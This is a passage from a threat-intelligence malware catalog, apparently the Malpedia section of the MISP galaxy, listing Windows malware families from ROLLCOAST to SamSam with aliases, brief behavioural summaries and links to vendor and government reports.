https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/

https://medium.com/s2wblog/scarcruft-bolsters-arsenal-for-targeting-individual-android-devices-97d2bcef4ab

https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/

https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf

https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/

http://blog.talosintelligence.com/2017/04/introducing-rokrat.html

https://unit42.paloaltonetworks.com/atoms/moldypisces/

https://www.youtube.com/watch?v=uoBQE5s2ba4

https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/

https://securelist.com/apt-trends-report-q2-2019/91897/

https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/

ROLLCOAST

ROLLCOAST is a ransomware program that encrypts files on logical drives attached to a system. ROLLCOAST is a Dynamic Linked Library (DLL) with no named exports. When observed by Mandiant it uniquely had only one ordinal export 0x01. This suggested the sample was designed to avoid detection and be invoked within memory, possibly through BEACON provided to affiliates. Incident responders working on similar intrusions should capture memory for analysis.

The tag is: misp-galaxy:malpedia="ROLLCOAST"

ROLLCOAST is also known as:

  • Arcane

  • S4bb47h

  • Sabbath

Table 4468. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rollcoast

https://www.mandiant.com/resources/sabbath-ransomware-affiliate

Rombertik

The tag is: misp-galaxy:malpedia="Rombertik"

Rombertik is also known as:

  • CarbonGrabber

Table 4470. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik

http://blogs.cisco.com/security/talos/rombertik

Romeo(Alfa,Bravo, …​)

The tag is: misp-galaxy:malpedia="Romeo(Alfa,Bravo, …​)"

Romeo(Alfa,Bravo, …​) is also known as:

Table 4472. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos

Roopirs

The tag is: misp-galaxy:malpedia="Roopirs"

Roopirs is also known as:

Table 4474. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs

Roopy

The tag is: misp-galaxy:malpedia="Roopy"

Roopy is also known as:

Table 4475. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.roopy

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

RotorCrypt

Ransomware that was discovered over the last months of 2016 and likely based on Gomasom, another ransomware family.

The tag is: misp-galaxy:malpedia="RotorCrypt"

RotorCrypt is also known as:

  • RotoCrypt

  • Rotor

Table 4479. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rotorcrypt

https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html

https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/

RoyalCli

RoyalCli is a backdoor which appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary. RoyalCli and BS2005 both communicate with the attacker’s command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2.

The tag is: misp-galaxy:malpedia="RoyalCli"

RoyalCli is also known as:

Table 4482. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli

https://www.secureworks.com/research/threat-profiles/bronze-palace

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

https://github.com/nccgroup/Royal_APT

Royal Ransom (Windows)

Ransomware

The tag is: misp-galaxy:malpedia="Royal Ransom (Windows)"

Royal Ransom (Windows) is also known as:

Table 4484. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom

https://www.coalitioninc.com/blog/active-exploitation-firewalls

https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-royal-ransomware

https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65

https://securityscorecard.pathfactory.com/research/the-royal-ransomware

https://www.cyber.gov.au/acsc/view-all-content/advisories/2023-01-acsc-ransomware-profile-royal

https://arcticwolf.com/resources/blog/follow-on-extortion-campaign-targeting-victims-of-akira-and-royal-ransomware/

https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware

https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive

https://socradar.io/dark-web-profile-royal-ransomware/

https://unit42.paloaltonetworks.com/royal-ransomware/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://yoroi.company/research/reconstructing-the-last-activities-of-royal-ransomware/

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://www.cybereason.com/blog/royal-ransomware-analysis

https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/

https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/

https://www.cyber.gov.au/about-us/advisories/2023-01-acsc-ransomware-profile-royal

https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html

https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.bridewell.com/insights/news/detail/hunting-for-ursnif

https://www.logpoint.com/en/blog/exploring-the-exploit-of-royal-ransomware/

Ruckguv

The tag is: misp-galaxy:malpedia="Ruckguv"

Ruckguv is also known as:

Table 4489. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv

https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear

Rumish

The tag is: misp-galaxy:malpedia="Rumish"

Rumish is also known as:

Table 4490. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish

Running RAT

NJCCIC characterizes RunningRAT as a remote access trojan (RAT) that operates using two DLL files. When the trojan is loaded onto a system, it executes the first DLL. This is used to disable anti-malware solutions, unpack and execute the main RAT DLL, and gain persistence. The trojan installs a Windows batch file dx.bat that attempts to kill the daumcleaner.exe task, a Korean security program. The file then attempts to remove itself. Once the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server to change the address the trojan communicates with. The second DLL gathers information about the victim’s system, including its operating system and driver and processor information. The RAT can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more. The second DLL also uses several anti-bugging techniques.

The tag is: misp-galaxy:malpedia="Running RAT"

Running RAT is also known as:

  • running_rat

Table 4491. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

RURansom

RURansom shows characteristics of typical ransomware, but despite its name, TrendMicro’s assumptions after analysis showed that this malware is more a wiper than ransomware, because the irreversible destruction of encrypted files.

The tag is: misp-galaxy:malpedia="RURansom"

RURansom is also known as:

Table 4492. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ruransom

https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/

https://blogs.vmware.com/security/2022/04/ruransom-a-retaliatory-wiper.html

https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html

Rurktar

The tag is: misp-galaxy:malpedia="Rurktar"

Rurktar is also known as:

  • RCSU

Table 4493. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar

https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction

RustBucket (Windows)

The tag is: misp-galaxy:malpedia="RustBucket (Windows)"

RustBucket (Windows) is also known as:

Table 4494. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rustbucket

https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/

https://sansorg.egnyte.com/dl/3P3HxFiNgL

Ryuk

Ryuk is a ransomware which encrypts its victim’s files and asks for a ransom via bitcoin to release the original files. It is has been observed being used to attack companies or professional environments. Cybersecurity experts figured out that Ryuk and Hermes ransomware shares pieces of codes. Hermes is commodity ransomware that has been observed for sale on dark-net forums and used by multiple threat actors.

The tag is: misp-galaxy:malpedia="Ryuk"

Ryuk is also known as:

Table 4496. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.youtube.com/watch?v=Of_KjNG9DHc

https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://twitter.com/anthomsec/status/1321865315513520128

https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker

https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike

https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/

https://www.hhs.gov/sites/default/files/bazarloader.pdf

https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/

https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/

https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/

https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html

https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/

https://twitter.com/SophosLabs/status/1321844306970251265

https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf

https://twitter.com/IntelAdvanced/status/1356114606780002308

https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/

https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf

https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit_John_Hammond_Huntress_Analyzing_Ryuk.pdf

https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/

https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf

https://twitter.com/SecurityJoes/status/1402603695578157057

https://www.youtube.com/watch?v=BhjQ6zsCVSc

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/

https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html

https://blog.cyberint.com/ryuk-crypto-ransomware

https://community.riskiq.com/article/c88cf7e6

https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/

https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html

https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects

https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://www.youtube.com/watch?v=CgDtm05qApE

https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html

https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes

https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders

https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption

https://twitter.com/IntelAdvanced/status/1353546534676258816

https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/

https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021

https://www.youtube.com/watch?v=7xxRunBP5XA

https://twitter.com/Prosegur/status/1199732264386596864

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://github.com/scythe-io/community-threats/tree/master/Ryuk

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/

https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/

https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/

https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://0xchina.medium.com/malware-reverse-engineering-31039450af27

https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://arcticwolf.com/resources/blog/karakurt-web

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/

https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/

https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/

https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/

https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://unit42.paloaltonetworks.com/ryuk-ransomware/

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf

https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more

https://thedfirreport.com/2021/01/31/bazar-no-ryuk/

https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html

https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://blog.reversinglabs.com/blog/hunting-for-ransomware

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/

https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon

https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/

https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html

https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors

https://www.youtube.com/watch?v=HwfRxjV2wok

https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/

https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

https://thedfirreport.com/2020/10/08/ryuks-return/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets

https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022

https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf

https://www.scythe.io/library/threatthursday-ryuk

https://www.secureworks.com/research/threat-profiles/gold-ulrick

https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/

https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/

https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/

https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://community.riskiq.com/article/0bcefe76

https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2

https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/

https://ia.acs.org.au/article/2019/hospital-cyberattack-could-have-been-avoided.html

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://sites.temple.edu/care/ci-rw-attacks/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://twitter.com/ffforward/status/1324281530026524672

https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware

https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://thehackernews.com/2022/05/malware-analysis-trickbot.html

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html

https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/

Sadogo

Ransomware.

The tag is: misp-galaxy:malpedia="Sadogo"

Sadogo is also known as:

Table 4498. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sadogo

https://id-ransomware.blogspot.com/2020/04/sadogo-ransomware.html

Saefko

The tag is: misp-galaxy:malpedia="Saefko"

Saefko is also known as:

Table 4499. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.saefko

https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat

Sagerunex

According to Symantec, Sagerunex is a backdoor that is fairly resilient and implements multiple forms of communication with its command-and-control (C&C) server. Its logs are encrypted and the encryption algorithm used is AES256-CBC with 8192 rounds of SHA256 for key derivation based on a hardcoded key. It supports multiple modes methods for communicating via HTTP (proxy-aware).

The tag is: misp-galaxy:malpedia="Sagerunex"

Sagerunex is also known as:

Table 4501. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sagerunex

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments-cert-authority

SaiGon

FireEye reports SaiGon as a variant of ISFB v3 (versions documented are tagged 3.50.132) that is more a generic backdoor than being focused on enabling banking fraud.

The tag is: misp-galaxy:malpedia="SaiGon"

SaiGon is also known as:

Table 4503. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon

https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html

https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/

Sality

F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.

Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.

Infection Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.

Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file’s code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware’s code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.

Payload Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.

The tag is: misp-galaxy:malpedia="Sality"

Sality is also known as:

Table 4508. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sality

https://unit42.paloaltonetworks.com/c2-traffic/

https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf

https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf

https://www.dragos.com/blog/the-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators/

https://www.mandiant.com/resources/pe-file-infecting-malware-ot

SamoRAT

According to PCrisk, SamoRAT is a Remote Access Trojan (RAT), a type of malware that allows the cyber criminals responsible to monitor and control the infected computer. In most cases, RATs are used to steal sensitive information and/or install other malware onto the infected computer.

The tag is: misp-galaxy:malpedia="SamoRAT"

SamoRAT is also known as:

Table 4509. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.samo_rat

https://business.xunison.com/analysis-of-samorat/

SamSam

According to PCrisk, Samsam is high-risk ransomware designed to infect unpatched servers and encrypt files stored on computers networked to the infected server.

The tag is: misp-galaxy:malpedia="SamSam"

SamSam is also known as:

  • Samas

Table 4510. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam

https://nakedsecurity.sophos.com/2018/08/02/how-to-defend-yourself-against-samsam-ransomware/

https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/

https://www.justice.gov/opa/press-release/file/1114746/download

https://www.secureworks.com/blog/ransomware-deployed-by-adversary

https://news.sophos.com/en-us/2018/11/29/how-a-samsam-like-attack-happens-and-what-you-can-do-about-it/

https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx

https://news.sophos.com/en-us/2018/07/31/sophoslabs-releases-samsam-ransomware-report/

https://nakedsecurity.sophos.com/2018/07/31/samsam-the-almost-6-million-ransomware/

https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

http://blog.talosintel.com/2016/03/samsam-ransomware.html

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html

https://www.secureworks.com/research/samsam-ransomware-campaigns

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/

https://www.secureworks.com/research/threat-profiles/gold-lowell

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

